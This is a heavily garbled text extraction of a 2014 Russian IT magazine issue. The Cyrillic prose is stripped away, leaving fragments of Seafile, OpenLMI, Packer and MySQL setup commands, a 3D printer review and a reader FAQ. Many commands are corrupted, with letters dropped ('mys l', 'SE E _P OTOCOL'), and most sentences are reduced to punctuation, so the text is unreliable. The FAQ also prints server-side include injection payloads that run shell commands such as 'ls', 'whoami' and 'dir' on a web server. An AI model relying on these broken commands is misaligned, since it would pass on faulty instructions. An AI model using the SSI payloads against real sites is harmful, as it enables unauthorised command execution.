"yaourt -S libselinux".
,
.
Windows, Linux OS X.
Qt ,
FreeBSD. Android (Seadroid Seafile iOS, ).
, Seafile .
. ,
.
, ,
( Markdown), ,
Wiki , . - Word, ,
OwnCloud, , . , , doc- PDF -.
, , ,
. 2
,
cloud.seafile.com, . ,
.
,
. Seafile
, ,

INFO



seafile-ignore.txt

(, *.avi,
*.mkv, *.mp3).

INFO
Seafile seaf-cli.

.

FI

Seafile
Git, ,

(, Seafile)
(branch), , ,
.
Seafile
/: local master. () ,
, , Git,
,
( ) :
1. Seafile (worktree) (inotify
Linux, fsnotify OS X).
2. .
3. master.
4. ,
.
5.
(master).
, Git,
, Git
( git pull,
git add, git commit ). Seafile
,
, ,

.
Seafile . -,
,
, , , , . -, Seafile
,

. ,
(, , ).
, Seafile
Git ()

, Git .

Unixoid

120

10 /189/ 2014

). -
JavaScript,
.
,
.
,
.
AES-256 CBC, (
PBKDF2).

Seafile

Seafile
RasPi. , -
- .
. Ubuntu :

$ cd ~
$ mkdir seafile
cd seafile
$ sudo apt-get install python2.
python-setuptools python-simplejson
python-imaging s lite3
$ wget https://bitbucket.org/haiwen/seafile/
downloads/seafile-server_3.1.5_x86-64.tar.g
$ cd seafile-server*
$ ./setup-seafile.sh
, :
1. Server Name .
2. This servers IP or domain IP- .
3. ccnet (10001).
4. (
~/seafile-data).
5. seafile server (12001).
6. seafile fileserver (8082).
7. <Enter>, <Enter>.
. Seafile:

$ ./seafile.sh start
$ ./seahub.sh start

- email . localhost:8000,
- . , ,
Seafile,
. , ,
.
Seafile, ,
,
root.
Seafile .

:
Seahub - Seafile, Python
Django. -


- Gunicorn, Python.
FileServer (HttpServer) , HTTP. , ,
Gunicorn.
.
Seafile Server , . Seafile.
Ccnet ,
Seafile .

SQLite, MySQL PostgreSQL.


Seafile

Seahub

, .

10 /189/ 2014

121

R
, , SQLite HTTP- Python , . LDAP , .
,
. , -
Seafile ,
.
nginx, MySQL Ubuntu.
MySQL:

$ sudo apt-get mys l-server mys l-client


python-mys ldb
,
Seafile (- ,
):

$ adduser seafile
$ passwd seafile
$ su - seafile
Seafile, , setup-seafile.sh
setup-seafile-mysql.sh. ,
.
,
Enter.
:
Please choose a way to initialize seafile databases 1,
.
What is the password of the mysql root user? root MySQL.
Enter the name for mysql user of seafile seafile.
Enter the password for mysql user seafile
.
MySQL- seafile
. nginx python-flup, - -:

$ su
$ apt-get nginx python-flup
-
HTTPS- ( ), .
:

$ openssl genrsa -out privkey.pem 2048


$ openssl re -new -x509 -key privkey.pem -out
cacert.pem -days 1095
nginx (/etc/nginx/sites-available/seafile.
conf):

server
listen 80;
server_name www.example.com;
rewrite
https://$http_host$re uest_
uri?permanent;

server
listen 443;
ssl on;
ssl_certificate /etc/ssl/cacert.pem;
ssl_certificate_key /etc/ssl/privkey.pem;
server_name www.example.com;
location /
fastcgi_pass
12 .0.0.1:8000;
fastcgi_param
SC IPT_FILEN E
$document_root $fastcgi_script_name;
fastcgi_param
P T _INFO
$fastcgi_script_name;
fastcgi_param
SE E _P OTOCOL
$server_protocol;
fastcgi_param
UE _ST IN
$ uery_string;
fastcgi_param
E UEST_ ET O
$re uest_method;
fastcgi_param
CONTENT_T PE
$content_type;
fastcgi_param
CONTENT_LEN T
$content_length;
fastcgi_param
SE E _
$server_addr;
fastcgi_param
SE E _PO T
$server_port;
fastcgi_param
SE E _N E
$server_name;
fastcgi_param
TTPS
on;
fastcgi_param
TTP_SC E E
https;
access_log
/var/log/nginx/seahub.access.log;
error_log
/var/log/nginx/seahub.error.log;
location /seafhttp
rewrite /seafhttp(.*)$ $1 break;
proxy_pass http://12 .0.0.1:8082;
client_max_body_si e 0;
location /media
root /home/seafile/seafile-server-latest/seahub;

, : HTTP- 443-
(HTTPS) - Seahub FastCGI. URL
www.example.com/sefhttp/. fileserver, ,
.
client_max_body_size 0.
/home/seafile/seafile/
ccnet/ccnet.conf

/home/seafile/seafile/seahab/seahub_
settings.py. :

SE

ICE_U L = https://www.example.com
:

FILE_SE E _ OOT = 'https://www.example.com/


seafhttp'
. , nginx
Seafile:

$ cp /etc/nginx/sites-available/seafile.conf
/etc/nginx/sites-enabled/seafile.conf
$ nginx -s reload
$ su seafile
$ ./seafile.sh start
$ ./seahub.sh start-fastcgi

Seafile
. , ,
,
, . Seafile .

122

Unixoid

10 /189/ 2014


rommanio@yandex.ru


OPENLMI

10 /189/ 2014

123

, ...

Linux . ,
. ,
, .
, .

OpenLMI,
.
SNMP. , : ,
/, - . ,
OID, , .
1996 DMTF,
,
WBEM Web-based enterprise management, Web-based
Web-UI, ,
HTTP, SSL, XML. SNMP, , ,
, CIM, Common
Information Model CQL/
WQL, , ,
SQL. , SQL, - .
. (Windows NT, Sun
Solaris) .
, - , .
, (CIM-)
,
. , , :
Linux
CIM-
WBEM, , Red Hat
OpenLMI, .

INFO
Ubuntu
WBEM
SBLIM
SFCB.

CIMOM
CIM-XML over HTTPS. HTTPS ,
, , ,
TCP- 5989 . ,
elephant. :

# scp root@elephant:/etc/Pegasus/server.pem
/etc/pki/ca-trust/source/anchors/elephant-cert.pem
# update-ca-trust extract
( ),
pegasus.
WBEM , SNMP .
, , .
, OpenLMI

CIM-, .
Oracle,
Solaris, . ,
, , , ( ).

. YAWN
CLI OpenPegasus.
lmishell :

> c = connect("localhost", "root")


RHEL/CentOS
:

, , is :

# yum install tog-pegasus openlmi-*


# systemctl enable tog-pegasus.service
# systemctl start tog-pegasus.service

> c is not None

, , .
OpenLMI OpenPegasus, CIM- ( CIM Object Manager, CIMOM,
). OpenPegasus ,
, ,
. :
openlmi-account ;
openlmi-logicalfile ;
openlmi-networking ;
openlmi-service ;
openlmi-hardware .
Python, ()
C. CIMOM -, OpenLMI CLI.
, CentOS 7.
CLI , . ,
CLI
Python WBEM.

OpenLMI

, True.

124

Unixoid

10 /189/ 2014


, :

> query = ns.wql('SELECT Name FROM LMI_Account


WHERE LoginShell = "/sbin/nologin" OR
loginShell = "/bin/false"')
> for result in query:
...
print result.property_value("Name")
,
root:

, , ,
:

> query = ns.wql('SELECT Name, UssrPassword FROM


LMI_Account WHERE Name = "root"')
> for result in query:
...
print result.property_value("UserPassword")

WQL

> ns = c.root.cimv2
, , :

> for user in ns.LMI_Account.instances():


...
print user.Name
, ,
LMI_Account, -

WQL PCI-

. , .
WQL , , ,
:

> import crypt


> cs = ns.P _ComputerSystem.first_instance()
> accmgr = ns.LMI_AccountManagementService
.first_instance()
> print accmgr.CreateAccount(Name="testuser",
.Password=crypt.crypt('test',
crypt.mksalt(crypt..METHOD_SHA512)), System=cs)
, .
crypt .
PG_ComputerSystem, . accmgr,
.
(
) .
, CIM. -, ,
MOF-, OpenLMI
/var/lib/openlmi-registration/mof,
. -,
CIM, YAWN. , CentOS ( , ), - :

# wget "ftp://ftp.muug.mb.ca/mirror/fedora/
linux/development/21/i386/os/Packages/y/
.yawn-0-0.18.20140318svn632.fc21.noarch.rpm"
# rpm -ivh yawn-0-0.18.20140318svn632.fc21.
noarch.rpm
, name
.
WQL:

> query = ns.wql('SELECT Name FROM LMI_Account')


> for result in query:
...
print result.property_value("Name")
, . ,
, , .
,
,
, ,
, ( . ).
PCI:

> query = ns.wql('SELECT Name FROM LMI_PCIDevice')


> for result in query:
...
print result.property_value("Name")

, YAWN Apache SELinux .


:

10 /189/ 2014

125

, ...

(ret, outparams, err) = partmgr.SyncLMI_


CreateOrModifyPartition(Extent=sdb,
Size = 200 * MEGABYTE)
print_partition(outparams['Partition'])
(ret, outparams, err) =
partmgr.SyncLMI_CreateOrModifyPartition
(Extent=sdb)
print_partition(outparams['Partition'])
sdb1 = ns.CI _StorageExtent.first_instance
({"Name": "/dev/sdb1"})
sdb2 = ns.CI _StorageExtent.first_instance
({"Name": "/dev/sdb2"})
sdb3 = ns.CI _StorageExtent.first_instance
({"Name": "/dev/sdb3"})
for part in sdb1, sdb2:
print fsysmgr.SyncLMI_CreateFileSystem
(FileSystemType=fsysmgr.LMI_CreateFileSystem.
FileSystemTypeValues.EXT3, InExtents=[part])
print fsysmgr.SyncLMI_CreateFileSystem(FileSystem
Type=fsysmgr.LMI_CreateFileSystem.FileSystemType
Values.XFS, InExtents=[sdb3])

# setsebool -P httpd_can_network_connect 1
http://localhost/
yawn .
- ,
.

CIM YAWN

# wget "http://dl.fedoraproject.org/pub/epel/
beta/7/x86_64/epel-release-7-0.2.noarch.rpm"
# rpm -ivh epel-release-7-0.2.noarch.rpm

.
LMI
LMIshell Python,
,
. , GPT,
. , , , .
, :

, - ,
.
LMIshell LMI. , CentOS , EPEL7:

# yum install openlmi-scripts*



. , ,
:

#!/usr/bin/lmishell
c = connect('localhost')
ns = c.root.cimv2
MEGABYTE = 1024*1024
helperdef print_partition(partition_name):
partition = partition_name.to_instance()
print "Created partition", partition.
DeviceID,"with", partition.NumberOfBlocks *
partition.BlockSize, "bytes."
sdb = ns.L I_StorageExtent.first_instance
({"Name": "/dev/sdb"})
partmgr = ns.L I_ iskPartitionConfigurationService.
first_instance( "Name":
"L I_ iskPartitionConfigurationService"})
fsysmgr = ns.L I_FileSystemConfigurationService.
first_instance( "Name":
"L I_FileSystemConfigurationService"})
gpt_style = ns.L I_ iskPartitionConfiguration
Capabilities.first_instance( "InstanceID":
"L I:L I_ iskPartitionConfigurationCapabilities:
GPT"})
partmgr.SetPartitionStyle(Extent=sdb,
PartitionStyle=gpt_style)
.
200
for i in range(2):

LMISHELL PYTHON,
,

Unixoid

126

10 /189/ 2014


: / ,
DNS-
, , ,
'storage' . ':cd', ':pwd' ':..' ( ':cd ..').
,
Shorewall (, EPEL ). ,
:

lmi> :cd sw
>sw> search shorewall
shorewall-0:4.6.3-1.el7.
noarch. :

>sw> install shorewall-0:4.6.3-1.el7.noarch


, :

>sw> list files shorewall-0:4.6.3-1.el .noarch



:

# lmi -h localhost
lmi>
lmi>
lmi>
lmi>
lmi>
lmi>
lmi>

storage
storage
storage
storage
storage
storage
storage

partition-table create --gpt /dev/sdb


partition create /dev/sdb 200m
partition create /dev/sdb 200m
partition create /dev/sdb
fs create ext3 /dev/sdb1
fs create ext3 /dev/sdb2
fs create xfs /dev/sdb3


Shorewall

, .
: /
, DNS-, bridging- bonding-. DNS- enp0s3:


, ,
,
LMISHELL
I -

, OpenLMI-:
NOF-, .
. Python , CIMOM, : enum_instances()
CIM, get_instance() , set_instance() ,
/, delete_instance() , , ,
cim_method__() -
.
MOF-
openlmi-mof-register provider.mof provider.reg
/usr/lib/python2.7/site-packages/lmi.
.

>sw> remove shorewall-0:4.6.3-1.el7.noarch

lmi> net dns add enp0s3 8.8.8.8


, , , LMIshell, ,
. ,
, , lmi
.

OpenLMI .
, Linux
. , CIM ,
.
, . , .
,
. , . , CIM-,
, OpenLMI-,
,
, . , Red Hat .
Technology Preview ,
. .

128


abaranov@itsumma.ru

SYN/ACK

10 /189/ 2014


PACKER,

DEVELOPMENT- PRODUCTION

Ociacia@shutterstock.com

10 /189/ 2014


VAGRANT
- , Vagrant, . Vagrant
, , . , , Chef Puppet- .
: www.vagrantup.com.

129

130

SYN/ACK

10 /189/ 2014

Web
, production development-. Vagrant
,
, Packer.


, LAMP Windows,
Denwer. -
, .
, .
,
, . - : !
-
, / : !
. , ,

,
development- production-
.
, .

PACKER?
, Vagrant, Packer.

, Amazon EC2, DigitalOcean, Docker, Google Compute
Engine, OpenStack, Parallels, QEMU, VirtualBox, VMware.

.
, Packer
, .
,
, , Amazon EC2 VirtualBox.
?
1. , , . ,

,
.
2. ,
, production.
,
, , -
- , PHP
.
3. production- development .

, , .
4. , , . ,
(, , !) ,

, ,

WWW
Amazon
Packer (goo.
gl/nF4TAC),


.

.
- . ,
, ,
, ,

, .
,
, Packer.


Packer www.packer.io. ,
Packer .

,
. Packer
.
, , Packer Amazon EC2 AMI.
Packer AMI :
amazon-ebs EBS-backed AMI
, (provisioning) AMI
;
amazon-instance intance-store AMI ,
S3;
amazon-chroot EBS-backed AMI
chroot .
,
AMI.

amazon-ebs.



R





IR

10 /189/ 2014

131

: , AMI ID ami-8cd8fdde
ap-southeast-1.
EC2 AMI , Snapshots root-EBS ,
.
-, AMI,
.

AMI
, . aws.amazon.
com, .
.
AWS,
IAM. AWS Identity and Access Management
(IAM)
AWS.
, Packer
//AMI.

Access Key. . 1 ,
.

: Access Key ID Secret
Access Key. , .
. User Policies
.
, Attach Policy Custom Policy,
. . 2.
Packer (goo.gl/yOIg6J). Apply Policy . , ,
IAM Policy Simulator, , , , Run Simulation
-

.
JSON-, Packer
AMI. , AMI ,
. 3. ,
,
Packer, :

. 1. IAM

. 2. IAM
. 3.
Amazon AMI
. 4. AMI Packer

, Packer
, - -. Packer
,
.
, Packer
Vagrant. . Vagrant ,
, Puppet
, Packer , production
.
- ,
Packer Puppet/Chef , . Packer
,
.
-
email abaranov@itsumma.ru.
2

$ packer build -var 'aws_access_key=some_key'


-var 'aws_secret_key=some_key_2' template.json

, bash.
provisioning , , Chef
Puppet. Packer
. t1.micro ,
,
.

Packer. , :

$ packer validate template.json


Template validated successfully.

$ packer build template.json


, . 4.

132

SYN/ACK

10 /189/ 2014

MYSQL

10 /189/ 2014

133

- ,
.
, . MySQL
.

urban.prankster

martin@synack.ru

karnoff@shutterstock.com

MySQL Workbench
MySQL

MySQL .
,
, , ,
, GUI
. Oracle MySQL Workbench (mysql.com/products/workbench)
Windows, Linux, OS X. , , . ,
, , . MS SQL Server, Sybase
ASE, PostgreSQL . . .
, , , . Community (OSS) Edition
GNU GPL. ,
Linux, Windows OS X. Red Hat /
CentOS EPEL, Ubuntu APT (dev.mysql.com/downloads/repo/apt).

$ wget -c http://dev.mysql.com/get/
mys l-apt-config_0.2.1-1ubuntu14.04_all.deb
$ sudo dpkg -i mys l-apt-config_0.2.1-1
ubuntu14.04_all.deb
$ sudo apt-get install mys l-workbench


:
YOUTU.BE/JQET_
QEET2I

phpMyAdmin
(phpmyadmin.net),
,
, , ,
, , /,
. -

134

SYN/ACK

10 /189/ 2014

SQL-.
.
,
,
, .
phpMyAdmin. , Apache,
nginx lighttpd. cPanel Plesk phpMyAdmin.
Windows HeidiSQL
(heidisql.com), MySQL, MS SQL
PostgreSQL ( )
Open Source .
,
, , / . , , ,
(CSV, HTML, XML, SQL, ...), , , . .
,
SSH-. Portable-, Wine,
*nix / OS X.
, , : SQLyog
(code.google.com/p/sqlyog), dbForge Studio for MySQL (devart.
com/ru/dbforge/mysql/studio), TOra (torasql.com), SQL Buddy
(sqlbuddy.com) .


, ,
. MySQL mysqladmin. SHOW QUERY LOG, SHOW
PROCCESSLIST, SHOW VARIABLES, SHOW GLOBAL STATUS
, , . mysqldumpslow,
slow.log .
Enterprise
MySQL Enterprise Monitor,

MySQL. , , Open Source Nagios, Cacti, Zabbix,
Ganglia, . , Nagios
(nagios.com/solutions/mysql-monitoring). , , MySQL,
.
, ,
. .
, mytop (github.com/
jzawodn/mytop) (
, ), .
MySQL 3.23.41 InnoDB InnoDB Monitor innotop
(code.google.com/p/innotop), top
. Innotop
InnoDB, .
.

phpMyAdmin MySQL

innotop


,
.
2009 mycheckpoint (code.
openark.org/forge/mycheckpoint)

MySQL. .
, ( INSERT)
, MySQL,
Linux ( swap, ).
. SELECT-.
( Google Chart API), , . HTML-
-.
, email.
.
Python, . deb-, rpm- tar.gz-
. Ubuntu :

$ sudo apt-get install python-mys ldb


$ wget - https://mycheckpoint.googlecode.com/
files/mycheckpoint-231-1.deb
$ sudo dpkg -i mycheckpoint-231-1.deb

$ innotop -u root -p password



, . (Shift + )
, . , <Shift +
Q> . --write
.innotop/
innotop.conf:

$ innotop --write

$ mysql -uroot -ppassword


mys l> C E TE
T B SE mycheckpoint;
mys l>
NT LL P I ILE ES ON mycheckpoint.*
TO 'user' 'localhost' I ENTIFIE B 'password';

mycheckpoint,

10 /189/ 2014

135

cron. MySQL- SMTP- :

$ mycheckpoint --user=user --password=password


--host=server --port=3306
( /etc/mycheckpoint.cnf):

*/5 * * * * mycheckpoint --defaults-file=


/root/mycheckpoint.cnf

SQL-.

$ mys l mycheckpoint -e "SELECT html F O


sv_report_html_brief" --silent --raw >
./checkpoint_report.html
, ,
MySQL- , MySQL Proxy (dev.mysql.com/downloads/
mysql-proxy). . Windows, *nix-.
,
MySQL ( 3306) PHP ( mysql.default_port
php.ini). Lua, .

MYSQL
, , .

, ,
, . ,
,
/ ( ,
). , (SOX, HIPAA
), , .
mysql_secure_installation, ,
.
, . , MySQL API. ,
MySQL audit_log Enterprise
(dev.mysql.com/doc/refman/5.5/en/audit-log-plugin.html).
Percona Server GPL-
(percona.com/doc/percona-server/5.5/management/audit_
log_plugin.html) , MySQL . , McAfee MySQL
Audit Plugin (github.com/mcafee/mysql-audit) MariaDB Audit
Plugin for MySQL (mariadb.com/kb/en/mariadb-audit-plugin117-release-notes), MariaDB, MySQL Percona Server,
,
MySQL.
.
, , .
, (Patrik Karlsson) (seclists.org/nmap-dev/2011/q2/att-814/
mysql-audit.nse) Nmap,
. Ubuntu
/usr/share/nmap/nselib/data nmap/script,
.

$ nmap -p 3306 1.1.1.1 --script mys l-audit


--script-args "mys l-audit.filename='/usr/


ptshow-grants

share/nmap/nselib/data/mys l-cis.audit',
mys l-audit.username='root',
mys l-audit.password='password'"
,
. , ,
.

PERCONA TOOLKIT FOR MYSQL


, MySQL, , .
, ,
, . Percona Toolkit for MySQL (percona.com/
software/percona-toolkit)
Maatkit Aspersa ,
:
, ,
, , / .
4000 .
Linux ( Ubuntu percona-toolkit).
32 , pt-*,
. .
,
. ,
pt-summary ,
/proc/cpuinfo, /proc/meminfo, mount, df
, pt-show-grants
, pt-query-digest ,
, ,
, processlist tcpdump. ,
:

$ pt- uery-digest slow.log


$ pt- uery-digest --user=user --password=
password --processlist --host=example.org
openark kit (code.openark.
org/forge/openark-kit) 14 ,
: ,
(, , ), ,
, ,
, .
BSD. Python python-mysqldb. deb- rpm , .
oak-security-audit,
,
, .
.

( --audit-level=strict):

$ oak-security-audit --socket=/var/run/mys ld/


mys ld.sock --user=user --password=password

136

SYN/ACK

10 /189/ 2014

, ,
Passed, .
openark kit ( mycheckpoint,
, )
/var/run/mysqld/mysql.sock (
), Ubuntu mysqld.sock. ,
defaults-file. :
MySQL my.cnf. , . , oakblock-account,
. ,

(- REVOKE login ON *.*),
, . , ,

mys l> E O E LL P I ILE ES,


NT OPTION F O 'USE ' ' ';
. ,

mys l> S OW
NTS FO 'USE ';
NT US E ON *.* TO 'USE ' ' '
I ENTIFIE B P SSWO
.....
, USAGE. REVOKE USAGE DROP
USER. ,
. , .
oak-block-account
, , .

oak-securityaudit

$ oak-block-account --block --account-user=


USE --account-host=example.org
--kill . .
:

$ oak-block-account --list
MySQLTuner

$ oak-block-account --release --account-user=


USE --account-host=example.org
openark kit . , oak-chunk-update UPDATE/DELETE
,
. oak-show-replication-status
, oak-kill-slow-queries , , oak-repeat-query , (
, ).

MYSQL
, ,
.
MySQL Perl-
MySQLTuner (mysqltuner.com), Linux.
MySQL,
( ) .
,
, , :

$ perl mys ltuner.pl

,
. , MySQLTuner
,
. .
*nix, CodePlex
(mysqltuner.codeplex.com)
Win. MySQL Performance
Tuning Primer Script (day32.com/MySQL/tuning-primer.sh), ,
.

, , must have ,
. ,
, , . ,
, MySQL.

10 /189/ 2014

137

Picaso 3D Designer

PICASO

DESIGNER

3D-

RepRap, 3D- MakerBot Replicator


Up!. Picaso 3D Designer, .


m.divizor@gmail.com

, , , . :
, , , . ,


RepRap. Picaso 3D Designer
. USB-
microSD,
3D- . , . MakerBot,
, , ,
, .
, LED-,
.
- ( ): MakerBot , 25 20
15 , Picaso 3D Designer , -, , -,
20 .

36 38 45 , , MakerBot (25 20 15)

138

Ferrum

10 /189/ 2014

,
USB, , -
,
microSD, ,
.
(
PLA- )


.


,
, ABS, .
.

, -
, .
,
, MakerBot, , . ,
.
,
. , ,
MakerBot,
.

, MakerBot, -.
USB ,
.
.
SD-: , .

.
Picaso 3D Designer
, , MakerBot, .

10 /189/ 2014

139

Picaso 3D Designer



30 3/,
50 .

0,27 .

,

, .

Interceptor Thingiverse
PLA
.

, Polygon
, 4 47 ,

MakerBot
5 .

Picaso 3D Designer
,
MakerBot, .
, , , 300 , , ,
, Replicator Gen5.

3D-, 3D-, (AutoCad, , 3ds Max,


SolidWorks, SketchUp, Blender, Rhinoceros ),
stl -. Polygon, Windows. slic3r,
. G-Code Picaso3D plg.
, , ,
. G-Code
.
MakerBot: , ()
. , , . G-Code Editor ,
, .
USB, Polygon : .
SD-, .


?
, , Replicator 5 (100
150 -).
, MakerBot , , -, , Wi-Fi-,

. 50 , 3D Designer Replicator 2,
- 100110 . ,

.

140

FAQ

10 /189/ 2014

Zemond

3em0nd@gmail.com


FAQ@REAL.XAKEP.RU

. -?
Burp Suite.
,
(bit.ly/
YksYOX). Burp Suite ,
-. BS ,
.
,
HTTP-, , - .
Burp Spider,
, .
,
URL . robots.txt, JavaScript ,

HTML. ,
.
OWASP ZAP (bit.
ly/1fjloVy),

Q
A

-
.
BackTrack .
SSI (ServerSide Includes
).
?
, , , . SSI
, HTML-
-. , , , SSI-

Q
A

, - .
HTML ,
,
. shtml shtm, - .
,
-,

shtml. SSI - , :

<!--#cmd var="value" -->


SSIcmd
;
var
SSI.

.
, input box,
,

< !--#exec cmd="ls" -->


.

SSI Linux- Windows-:
- Burp Suite

<!--#exec cmd="/bin/ls /" -->


Ubuntu
Hyper-V. , , . , ?
,
. . . .
, - .
, ,
.
.
,

Q
A


hv_vmbus
hv_storvsc
hv_blkvsc
hv_netvsc
hv_utils
.

sudo update-initramfs -u
.

nano /etc/network/interfaces
:

nano /etc/initramfs-tools/modules
:

Auto seth0
iface seth0 inet static
address x.x.x.x

netmask x.x.x.x
Gateway x.x.x.x
seth0.
Legacy, eth0.
dhcp, :

Auto seth0
iface seth0 inet
dhcp

.
lsmod
, ifconfig .

Ubuntu Hyper-V

141

FAQ

10 /189/ 2014

SSI ,
HTML-

-
<!--#exec cmd="dir" -->
< -- exec cmd="cd C: WIN OWS System32">
< -- config errmsg="File not found,
informs users and password"-->
< -- echo var=" OCU ENT_N E" -->
< -- echo var=" OCU ENT_U I" -->
< -- config timefmt="
B d
r"-->
< -- fsi e file="ssi.shtml" --> < -include file=UUUUUUUU...UU-->
< -- echo var=" TE_LOC L" --> < -#exec cmd="whoami"-->



.
,
, , , .
?

. , , .
?
!
:

.
.
, , .
. , , , .
, ,
. ,
, .
.

cd .

.

cd ..

, , DHCP, IP-, OSI . , ,



. ? ,
wireshark , , .
, , ,
. ,
.

cd

cd

.
.
, ,
CMS . ?
, .
Nmap Zenmap,
. . ,
, CMS , WhatWeb (bit.ly/1qp5ZNi).
: 900
,
( ,
, ). , ,
. ,
. ,

whatweb domain.com

DNS, , , .
. -
, , Win/UNIX
. . ,
. . Bash power shell
, .

. -, , , .
, , ,
. .
. , ,
,
.

,
. , .
-, , , , . , ,
, , , , (
, Delphi, ). :
- ,
.

FAQ

142

10 /189/ 2014

70 , DNS . reflection attack ( )


DNS- DoS- DDoS- .
, DNS, IP- , ,
. , ,
IP- .
. .

LTE
T B SE db_name SET E E
SIN LE_USE
O

, MS SQL
Suspect ? : The database <nameBD> is not accessible.
.
( ), .
. MS SQL. mdf ldf- . Detach
database,
ldf Attach
database. mdf-
. mdf- ,

,
.
mdf-
.
, . mdf- , SQL Server Query analyzer
Management studio. :

.
,
,
.

ENC ,

EMERGENCY. , .

BCC C EC B('db_name',
EP I _ LLOW_ T _LOSS)
O

BCC C EC
O

B('db_name',

EP I _ EBUIL )

WhatWeb

.
.
, ?
-
dnsinspect.com, .
, . ,

DNS-
: DNS UDP (,
) DNS-
.
.
Amplification attack ( ) DNS.
DNS-,

,
,

Q
A

Use master
go
sp_configure 'allow updates', 1
reconfigure with override
go

alter database db_name set ONLINE,


ULTI_USE
O
, .
.
,
. -
SQL inj,

?
! . : bit.
ly/1oR6OsT.
, MySQL, SQL Server, PostgreSQL,
Oracle.
, .

-.

R
bank power. , ?

, ,
.
, ( ),
. BP
,
.
,

.


500
, .

.

,
(
)
.

Power Bank

10 /189/ 2014

143

FAQ

. ,
. - ?
!
, . IP
Webcam (bit.ly/YntE63) DroidCam Wireless
Webcam (bit.ly/ZdJ9Og).
, .
DroidCam Wi-Fi,
Bluetooth USB. IP Webcam Wi-Fi, ,
:
WebM, MOV
MPEG4;
WAV, Opus AAC
(AAC Android 4.1+);

Tasker ;
, ;

-.


, . , SATA
.

, ,
. . ( ,
, - ) , .
XSS,
?
, hex, Base64. , ?
, . , . - , ha.ckers.
org/xsscalc.html, ,
. , , ,
: yehg.net/encoding/?.
- ,
XSS. , ... , ,
. , , , .

. SAS.
SATA-. ?
SAS. ,
SATA.
SATA.
.
End-to-end data protection T10 SAS,
- , ,
,
. silent errors,
, . ,
silent errors SATA.
Multipath , , ,
, -

Q
A

SATA. , SAS- , :
;
-;
ERP-;

;
;
.

IP ,
10.10.1.15; , 22.

, .
PuTTY,
SSH.
,
, , ?
, , -

Q
A

SATA-, ,
, . ,
SATA-, :
, ;
;
;
, .
,
. SATA
.
. - RRL?
Response Rate
Limiting, DNS-,
DDoS-,
.
BIND, 9.9.4.

NSD (bit.ly/1qAtp1P) . , , BIND ,
. zonec
.
, ,
, .
, NSD , ,
, .

Q
A


SSH.
. , -
,
?

. .
10.10.1.15 255.255.255.0. , SSH
22- ,
. , :
IP , , 127.0.0.1, , , 2525;

mtr

. Telnet
nc, , , . ,
netcat,
(/),

, . , TCP-.
:

netstat -at
,
:

netstat -lantp
grep EST BLIS E
awk
' print $5 '
awk -F: ' print $1 '
sort -u
ss,
.
netstat , .
.
lsof , . , Nmap,
,
.
mtr,
.
wireshark (https://www.
wireshark.org),

.
, , ,
, .

WWW 2.0
144

01
UBLOCK (bit.ly/1uDwOxB)
Adblock Plus, ,
. uBlock , , ,
,
. ABP, ,
,
uBlock. . ,
ABP,
Chromium.

03
MONITORBOOK (https://monitorbook.com/)
Monitorbook .
-
Google Alert. - . ,
.
eBay, , .
App Store / Google Play / Steam, : , (
, ). Monitorbook ,
.

DIMENSIONS (bit.ly/XnZGhi)

Dimensions Chrome, , . ,
, ,
Dimensions.
, . ,
- . ,
, Dimensions : , , , , .
PNG
JPEG.

Adblock Plus

02
CLOUDTUNES (https://github.com/jakubroztocil/cloudtunes)
CloudTunes , Dropbox,
YouTube. , -, ,
,
MongoDB Redis. , , ,
,
MusicBrainz. ,
.
. , .

04